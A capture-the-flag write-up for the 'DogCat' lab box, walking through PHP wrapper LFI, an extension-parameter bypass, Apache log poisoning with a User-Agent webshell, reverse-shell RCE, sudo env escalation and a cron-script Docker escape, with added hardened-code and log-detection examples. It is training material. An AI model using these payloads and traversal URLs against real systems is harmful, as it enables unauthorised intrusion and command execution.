DogCat

Enumerating Parameters - Bypass PHP Filter using Wrapper - Exploiting LFI to get RCE - Env PrivEsc - Docker Escape

  • Starting off with an nmap scan to find the open ports

# Nmap 7.93 scan initiated Thu Feb  2 13:32:37 2023 as: nmap -sCV -A -vv -p 22,80 -oN nmap.log 10.10.27.48
Nmap scan report for 10.10.27.48
Host is up, received conn-refused (0.27s latency).
Scanned at 2023-02-02 13:32:43 IST for 22s

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 2431192ab1971a044e2c36ac840a7587 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCeKBugyQF6HXEU3mbcoDHQrassdoNtJToZ9jaNj4Sj9MrWISOmr0qkxNx2sHPxz89dR0ilnjCyT3YgcI5rtcwGT9RtSwlxcol5KuDveQGO8iYDgC/tjYYC9kefS1ymnbm0I4foYZh9S+erXAaXMO2Iac6nYk8jtkS2hg+vAx+7+5i4fiaLovQSYLd1R2Mu0DLnUIP7jJ1645aqYMnXxp/bi30SpJCchHeMx7zsBJpAMfpY9SYyz4jcgCGhEygvZ0jWJ+qx76/kaujl4IMZXarWAqchYufg57Hqb7KJE216q4MUUSHou1TPhJjVqk92a9rMUU2VZHJhERfMxFHVwn3H
|   256 213d461893aaf9e7c9b54c0f160b71e1 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBouHlbsFayrqWaldHlTkZkkyVCu3jXPO1lT3oWtx/6dINbYBv0MTdTAMgXKtg6M/CVQGfjQqFS2l2wwj/4rT0s=
|   256 c1fb7d732b574a8bdcd76f49bb3bd020 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIfp73VYZTWg6dtrDGS/d5NoJjoc4q0Fi0Gsg3Dl+M3I
80/tcp open  http    syn-ack Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: dogcat
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Feb  2 13:33:05 2023 -- 1 IP address (1 host up) scanned in 28.30 seconds
  • The /?view PHP query parameter displays .jpg files; every time you request a dog image the backend serves a different picture, which means it already has a few pictures stored

  • When we append a slash after dog, we get an error. The backend uses PHP's include to load the file named by the parameter, which is a textbook LFI candidate. The error also shows that a .php extension is appended after whatever we supply, which is suspicious, so why not check the index.php one directory up: /?view=dog/../index (no .php added, since it is appended automatically)

  • Still no clue, it returns the same error, so let's try a PHP wrapper to base64-encode the desired output. When we do, we get index.php back in base64 form

  • Decoding the above gives us the source code, which shows how the filtering works:

        <?php
            function containsStr($str, $substr) {
                return strpos($str, $substr) !== false;
            }
            $ext = isset($_GET["ext"]) ? $_GET["ext"] : '.php';
            if(isset($_GET['view'])) {
                if(containsStr($_GET['view'], 'dog') || containsStr($_GET['view'], 'cat')) {
                    echo 'Here you go!';
                    include $_GET['view'] . $ext;
                } else {
                    echo 'Sorry, only dogs or cats are allowed.';
                }
            }
        ?>
  • We can see that we control the $ext variable, which is responsible for appending .php to the filename, and, most importantly, that the view value only has to contain either dog or cat anywhere in the string (containsStr is a strpos check, not a prefix or exact match)

So in order to bypass this, we add the ext parameter to our URL with an empty value:

http://example.com/?view=dog/../index&ext=
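A hardened version of the include logic above, added here as an example (not the challenge's own code): the view name must match an allowlist exactly rather than merely contain dog or cat, the extension is fixed server-side so the ext parameter has no effect, and the resolved path is checked against an assumed web root BASE_DIR.

```php
<?php
// Added example (not the challenge's own code): a hardened replacement for the
// dogcat include logic. BASE_DIR is an assumed web root; adjust to the deployment.

const ALLOWED_VIEWS = ['dog', 'cat'];   // exact allowlist instead of a substring test
const BASE_DIR = '/var/www/html';       // assumed location of dog.php and cat.php

/**
 * Map the requested view to a file path, or return null when it is not allowed.
 * The extension is fixed here; nothing in the request can change or remove it.
 */
function resolveView(string $view, string $baseDir = BASE_DIR): ?string
{
    // A strpos()-style "contains" check passes 'dog/../index' and
    // 'php://filter/.../resource=dog'; an exact allowlist match rejects both.
    if (!in_array($view, ALLOWED_VIEWS, true)) {
        return null;
    }
    $target = realpath($baseDir . '/' . $view . '.php');
    $root   = realpath($baseDir);
    // Defence in depth: the resolved file must still live under the web root.
    if ($target === false || $root === false
        || strncmp($target, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $target;
}

// Request handling: $_GET['ext'] is deliberately never read.
if (isset($_GET['view'])) {
    $file = resolveView((string) $_GET['view']);
    if ($file === null) {
        http_response_code(400);
        echo 'Sorry, only dogs or cats are allowed.';
    } else {
        echo 'Here you go!';
        include $file;
    }
}
```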
  • Using the above trick we can dump /etc/passwd. There are no regular users with a login shell; apart from root, only the www-data service account is of interest

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
  • Now let's abuse the LFI: checking /var/log/apache2/access.log, we find our User-Agent logged with every request, which confirms that Apache log poisoning is possible and can be leveraged into RCE!

  • In order to exploit log poisoning, we first have to place the PHP command payload in our User-Agent:

<?php system($_GET['cmd']);?>
  • Insert a PHP exec reverse shell from https://revshells.com as the cmd value and catch the reverse shell!

http://example.com/?view=dog/../../../../../var/log/apache2/access.log&ext=&cmd={ PHP SHELL }

User-Agent = <?php system($_GET['cmd']);?>

NOTE: Do not make any mistake while inserting the PHP payload in the User-Agent. Once a broken payload lands in the log file, PHP fails to parse the log when it is included, so no matter what you do afterwards you will not get the desired result, and you will not even be able to view access.log through the LFI anymore. Grab the first flag, go one directory back and cat out the second flag.
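To detect rather than perform the two steps above, here is an added example (not from the write-up) that scans Apache combined-format access-log lines for php:// wrappers, traversal and an empty ext parameter in the request line, and for PHP tags in the User-Agent; the sample log lines are constructed.

```php
<?php
// Added example (not from the original write-up): scan Apache combined-format log
// lines for LFI/wrapper abuse and for PHP code planted in the User-Agent. Constructed sample data.
const LOG_LINE = '/^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/';
const SAMPLE_LOG = [
    '10.0.0.5 - - [02/Feb/2023:13:40:01 +0000] "GET /?view=dog HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [02/Feb/2023:13:41:12 +0000] "GET /?view=php://filter/convert.base64-encode/resource=dog/../index HTTP/1.1" 200 1893 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [02/Feb/2023:13:42:30 +0000] "GET /?view=dog/../../../../../etc/passwd&ext= HTTP/1.1" 200 1320 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [02/Feb/2023:13:43:05 +0000] "GET /?view=dog HTTP/1.1" 200 512 "-" "<?php system($_GET[\'cmd\']);?>"',
];

/** Findings for one log line; an empty array means nothing suspicious was seen. */
function inspectLogLine(string $line): array
{
    if (!preg_match(LOG_LINE, $line, $m)) {
        return ['unparseable line'];
    }
    $ip = $m[1];
    $request = rawurldecode($m[3]);   // decode so %2e%2e%2f is caught as well
    $ua = $m[6];
    $findings = [];
    if (preg_match('#php://#i', $request)) {
        $findings[] = "php:// wrapper in request from $ip";
    }
    if (preg_match('#\.\.[/\\\\]#', $request)) {
        $findings[] = "path traversal in request from $ip";
    }
    if (preg_match('/[?&]ext=(&|\s|$)/', $request)) {
        $findings[] = "empty ext parameter (extension override) from $ip";
    }
    if (preg_match('/<\?(php|=)/i', $ua)) {
        $findings[] = "PHP tag in User-Agent from $ip (log poisoning attempt)";
    }
    return $findings;
}

function scanLog(array $lines): array
{
    $report = [];
    foreach ($lines as $i => $line) {
        foreach (inspectLogLine($line) as $finding) {
            $report[] = sprintf('line %d: %s', $i + 1, $finding);
        }
    }
    return $report;
}

foreach (scanLog(SAMPLE_LOG) as $entry) {
    echo $entry, PHP_EOL;
}
```

Lines 2 to 4 of the sample each produce at least one finding; line 1 produces none.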

Privilege Escalation

  • Let's start our enumeration by reading the sudo permissions for the current user

  • GTFOBins to the rescue!

sudo env /bin/sh
  • Enumerating the box further suggests there is a Docker container and that flag4 is hidden there; enumerating the /opt directory gives us a writable file called backup.sh

  • It seems that this .sh file is run as a cron job, so let's just append our reverse shell to it to get r00t
